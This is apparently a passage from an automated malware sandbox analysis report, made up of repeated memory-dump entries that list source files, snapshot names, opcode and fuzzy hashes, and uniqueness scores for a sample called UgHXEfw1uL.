
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2fecc270753a9afb9b4fa20e3f321fd0e13c860daae209633ced3734d4de3fd4
                                          • Instruction ID: ab58ad8e9b20677975b57699a7b307b4eddf11e1d70ebe12ffab5b9ff1ca2c61
                                          • Opcode Fuzzy Hash: 2fecc270753a9afb9b4fa20e3f321fd0e13c860daae209633ced3734d4de3fd4
                                          • Instruction Fuzzy Hash: 25F09032D226F49FD7218B58E444BE27BD4AB00770F1D496AD95987511C7E8FC80E651
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b62552be0d47ae483a00d52c6f93da6f4e86304b375b455d3d8cb647ce9b230d
                                          • Instruction ID: 57ae8f85d142c0ea20c5060632a55e6d54e59ecf271eb1f55838529ac27b0344
                                          • Opcode Fuzzy Hash: b62552be0d47ae483a00d52c6f93da6f4e86304b375b455d3d8cb647ce9b230d
                                          • Instruction Fuzzy Hash: 6AF082768166C406CB315B29BC523D17B6AA746324F1E144AD4E15F206C9FE89C3E324
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e05e22f011343de6eefd5ab0aae67b738808ba5b972e94106fcb3f7f4cf7c3c
                                          • Instruction ID: b697e1a99dc7819a02abb42518ed7075163097441dcc3eb032685a8a2a0709de
                                          • Opcode Fuzzy Hash: 0e05e22f011343de6eefd5ab0aae67b738808ba5b972e94106fcb3f7f4cf7c3c
                                          • Instruction Fuzzy Hash: 9AF0E2769117549FC3229718C148B6173D4AB40FB2F19A565DE0F87512C3A4DE89EAD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                          • Instruction ID: 5052988d93fa39af5667b853ed106479ef9df0c24157c912e19c7f7a477f11d8
                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                          • Instruction Fuzzy Hash: 33E0D832300A002BD7119E59CCC1F47776EEFC2B20F040079B5045F252C9E6DD0997A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                          • Instruction ID: d363ac5bd129ee74ad3c6d9d7145a9730a4ac5629995cdfbbc692ca08802b49b
                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                          • Instruction Fuzzy Hash: 67F01C725046049FE3209F07D944BA2B7A8EB457A4F558025E609DB561D37DEC40EFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                          • Instruction ID: ca8d04e58e8d71c82da19c647c14648d2bbac2fdf2bba63d7a10b876b47ef2ad
                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                          • Instruction Fuzzy Hash: 47F0E53B6043649BDB15CF19E040A957BA5EB45360F144096F8468B342DB39FD81EB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                          • Instruction ID: 112660ee3717b77009c25cf586bfa8ff9ecc644a893b43830a66d3c6ea6e3183
                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                          • Instruction Fuzzy Hash: AAE02233284146ABC3601E148800B2A7AA59BC07B2F110028EB088B140DB78ECC4F398
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                          • Instruction ID: 2924b44ac878c66f12f2fd1d59baecb2a740083549d8c05baa6a61a9008eaa78
                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                          • Instruction Fuzzy Hash: A3E02632A00120FBDB219799CE02F9BBABCDF80FA5F050058BA00E70D0D930EE00E6D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b98be006c015c86bf8a949285e02b5ec5dce74d580a3140cc71d3a9dc0dcf49e
                                          • Instruction ID: 073439ceef9bc2e65a49634b145d12e33fc9b691b0b68e1d4c5db14d8a4e2d0c
                                          • Opcode Fuzzy Hash: b98be006c015c86bf8a949285e02b5ec5dce74d580a3140cc71d3a9dc0dcf49e
                                          • Instruction Fuzzy Hash: D8E09232100954ABC321FB29ED02F8B7B9AEB94360F014515B15557191CB79A950D784
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                          • Instruction ID: 0310028eb1471a16b9192dae325986f79a5e4d2f4ef0cddaf4e3fda262a733cf
                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                          • Instruction Fuzzy Hash: DDE0C2747003058FD715CF19C040B6277B6BFD6B20F28C068A9488F205EB72E842EB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6134efd3287876eec03691b77e1e56ceff529b46b21d4b315831a09287239ed1
                                          • Instruction ID: f33edb013a8fa29c20ca2f4edeb1d5578f570d8bfefae4de851462853d70e73c
                                          • Opcode Fuzzy Hash: 6134efd3287876eec03691b77e1e56ceff529b46b21d4b315831a09287239ed1
                                          • Instruction Fuzzy Hash: 8ED0C2328811206ECB24E114BC24F933E599B41721F014860FA0992010D56CCC85B2C4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                          • Instruction ID: c665d7ce518f898c8e9707219f3029c6c7289f99568d30aed67faa74cc21b5fb
                                          • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                          • Instruction Fuzzy Hash: BCE0C232400A50EFDB322F11DD01F9177A1FFA8BA0F20482AF085160A58B78ACC2FB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                          • Instruction ID: 8783684fe87206be072c3352c6818556e53954955adf8d2de3a3e743ae00d719
                                          • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                          • Instruction Fuzzy Hash: B3E08631401A30DED7316F12EE05B9277A5AB507A0F104429B006154A18B789CC6F695
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 064e8f05e9f7d1a9f84664962dc26a1e389a13ab364047bae14be3b885233427
                                          • Instruction ID: dab14adb2aca192b0e7f0f970f584bc9fe06abe9817c0d04754791906b2fbc20
                                          • Opcode Fuzzy Hash: 064e8f05e9f7d1a9f84664962dc26a1e389a13ab364047bae14be3b885233427
                                          • Instruction Fuzzy Hash: 1CE08C321004606BC211FA5DED02F4A779AEB943A0F010221B15197291CA69AD40D794
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                          • Instruction ID: c7b3de9d9f10d710f50be94a560e9f7372e51e2fd9ca5f02372406d28b4d29a9
                                          • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                          • Instruction Fuzzy Hash: 32E02633110A0497C328DE18C411B7273A4EF44731F08423EAA1347380C934E808D794
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b5e610e3d6a995704b702a53550fdc45c50806775a4f44a2e06cd3b2d44e0d92
                                          • Instruction ID: 7b4d56eadec159dfcfbdb70ccdba60542c7f70a475fa5d7ba7a5665dcf62b959
                                          • Opcode Fuzzy Hash: b5e610e3d6a995704b702a53550fdc45c50806775a4f44a2e06cd3b2d44e0d92
                                          • Instruction Fuzzy Hash: 31D01233A551544FC6268D6CF841BE4F374EF8722CF5132DFD8886B6248773A05586C9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                          • Instruction ID: 4ad0ea140539b12f849509fcb32e82de2df5c1b00e63b981c9370fd265cce676
                                          • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                          • Instruction Fuzzy Hash: EDD05E36511A50AFC3329F1BEE00C13BBF9FBC4B60705062FA44593920C674AC06DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                          • Instruction ID: 150e57b9d1b76eeee858cb78ec0f8c473964e4fceffd566fb2f5cd6f3df98448
                                          • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                          • Instruction Fuzzy Hash: FFD0A932608620ABEB32AA1CFC00FC333E8AB88770F060459B008C7050C3A8AC81DA84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                          • Instruction ID: 82c6a63528ee8a2a3bade5f5d8833686d5f0db3407741f4031edfd9ae2297d7e
                                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                          • Instruction Fuzzy Hash: C3E0EC359506849BDF12DF59DA40F5AB7F5BB84B50F151054A0486B661C628AD00DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                          • Instruction ID: 314887572c1dc1b23eb075bdd7c5df3f822ea021f5bb5d631df2c0482bd17622
                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                          • Instruction Fuzzy Hash: E7D01233617070A7CB2996656D14FA779559B85BA4F1A006D740AA3900C5198C82F6E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                          • Instruction ID: 6696bed258bdea5182edf23ba6acf5434442845bb4695951c2db6eea90d84075
                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                          • Instruction Fuzzy Hash: 62D012371D054CBBCB11DF65DC02F957BA9E754BA0F445020B504875A1C63EE950D584
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 222205709aa679713c196ebc111819f1c75d63bea3fad4c8c18da26d3276957f
                                          • Instruction ID: f2b4869a136d732b360799002e32caa94b9c3e79d5f4d97d6a5ab8317f85e810
                                          • Opcode Fuzzy Hash: 222205709aa679713c196ebc111819f1c75d63bea3fad4c8c18da26d3276957f
                                          • Instruction Fuzzy Hash: E6D0A731901106CFDF26CF08C920E2E3AB0EF24B92F400068EB0151020D72DEC02F640
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                          • Instruction ID: 23318b7fd03998e971a138734be29ef4352306f9c990fc0ffaadd79879191960
                                          • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                          • Instruction Fuzzy Hash: B3D0C935612E80CFC71BCB0CC5A8F1633A8BB44B54F8104A1E401CBB21DA6CED40DB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                          • Instruction ID: 3a42ca4a64438ccf40a6d53abc3de0eb30844774c988b17cca49c835be7e08d1
                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                          • Instruction Fuzzy Hash: C8C08C33290648AFC712EF98DD02F027BE9EB98B90F000021F3048B671C639FD20EA84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7dbc1d9ef3a7f2b16fb9132c4c12543777837b6bc816011bec8628421671011c
                                          • Instruction ID: fb78338b0c61c0110e2f50b6a983d39ac32e1e2a99fdb078c0eb34289fec18a7
                                          • Opcode Fuzzy Hash: 7dbc1d9ef3a7f2b16fb9132c4c12543777837b6bc816011bec8628421671011c
                                          • Instruction Fuzzy Hash: BBB01223F50214068A348C5DFA44474F371D1CB033E1073B7CF8DB30445112D01502DC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                          • Instruction ID: a92619d84c4acc5baa6e0af23c602ab74a85c9b584d464dc6a758b2c2297101a
                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                          • Instruction Fuzzy Hash: 23D01236100248EFCB01DF41C890DAA7B2AFBC8710F108019FD19076118A35ED62DA50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                          • Instruction ID: 815180baecf95ffc57ff753d54278832697a806c6fcaa50e00e84923119b881f
                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                          • Instruction Fuzzy Hash: 16C04C797015458FCF15DB19D694F4577E4F744760F1548D1E805CB721E628ED01DA11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f6f981e731fd97ae191c07adadac704c0ca766b964b6db29a9bd7ac5f015692
                                          • Instruction ID: 61d233bdabd8ee13914afa555c8c4e679220601cf58d7513649a67504bbb1b45
                                          • Opcode Fuzzy Hash: 9f6f981e731fd97ae191c07adadac704c0ca766b964b6db29a9bd7ac5f015692
                                          • Instruction Fuzzy Hash: AD90023164580022A24071588888546400597E0341B55C033E0464554D8E188A576362
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 54e50f520431e3967c96638485c162e5305e4397cceb0f90d3185e95d5a0b528
                                          • Instruction ID: 77eccbcaa0a45660ece818484d2b6e2a0a7fd2a42fc9be3103f43e86882e891a
                                          • Opcode Fuzzy Hash: 54e50f520431e3967c96638485c162e5305e4397cceb0f90d3185e95d5a0b528
                                          • Instruction Fuzzy Hash: 5C90026164150052524071588808406600597E1341395C137A0594560D8A1C8956A26A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e3f839bcc0afdfcc8ad517cf5097d53ed114e29f1fc0824e5c148285d45d21a
                                          • Instruction ID: 84305c7630571e15aa5421182aae9a4e4edd492c61032b30c1d91c5dccc39e4a
                                          • Opcode Fuzzy Hash: 7e3f839bcc0afdfcc8ad517cf5097d53ed114e29f1fc0824e5c148285d45d21a
                                          • Instruction Fuzzy Hash: 65900225261400121245B558460850B044597D6391395C037F1456590DCA2589666322
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f2ad73a3f02ff97d4e47fb4d7e44f78375c5f2e5f77a8cae770117afdf5c0e9
                                          • Instruction ID: 0e1049d65488b94115c785dc7adc61b4df3dd9140cafc524ed53bd046cb828c7
                                          • Opcode Fuzzy Hash: 1f2ad73a3f02ff97d4e47fb4d7e44f78375c5f2e5f77a8cae770117afdf5c0e9
                                          • Instruction Fuzzy Hash: C69002A1241540A25600B258C408B0A450587E0341B55C037E1094560DC9298952A136
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5c69a5c49888e74cf3e45c4aae50768d5d47c5dbe675bbe929395772f55f655d
                                          • Instruction ID: b083a8ad507bddf0a2efe921d8a2248c50c89730d52628806dabe5054c8dad6c
                                          • Opcode Fuzzy Hash: 5c69a5c49888e74cf3e45c4aae50768d5d47c5dbe675bbe929395772f55f655d
                                          • Instruction Fuzzy Hash: C690023124544852E24071588408A46001587D0345F55C033A00A4694E9A298E56B662
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b2c97f577812cc93777f6f312027bcfd4ca25f2ebfcff3da3cbf8907d9cfc7e4
                                          • Instruction ID: 698626a8d66b56895a0bfa8d0cf75c0fad75c1895f02be0ffadbcdf95c5afeb6
                                          • Opcode Fuzzy Hash: b2c97f577812cc93777f6f312027bcfd4ca25f2ebfcff3da3cbf8907d9cfc7e4
                                          • Instruction Fuzzy Hash: B090023164540812E25071588418746000587D0341F55C033A0064654E8B598B5676A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e86c979b888fbbf02da9382a88786c7e717a111346a098584462ea859b41880b
                                          • Instruction ID: 659307e5b731679705fe421d3c98c410f6a23af3db77bb735db3df80ffe6bf46
                                          • Opcode Fuzzy Hash: e86c979b888fbbf02da9382a88786c7e717a111346a098584462ea859b41880b
                                          • Instruction Fuzzy Hash: D990023124140812E20471588808686000587D0341F55C033A6064655F9A6989927132
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
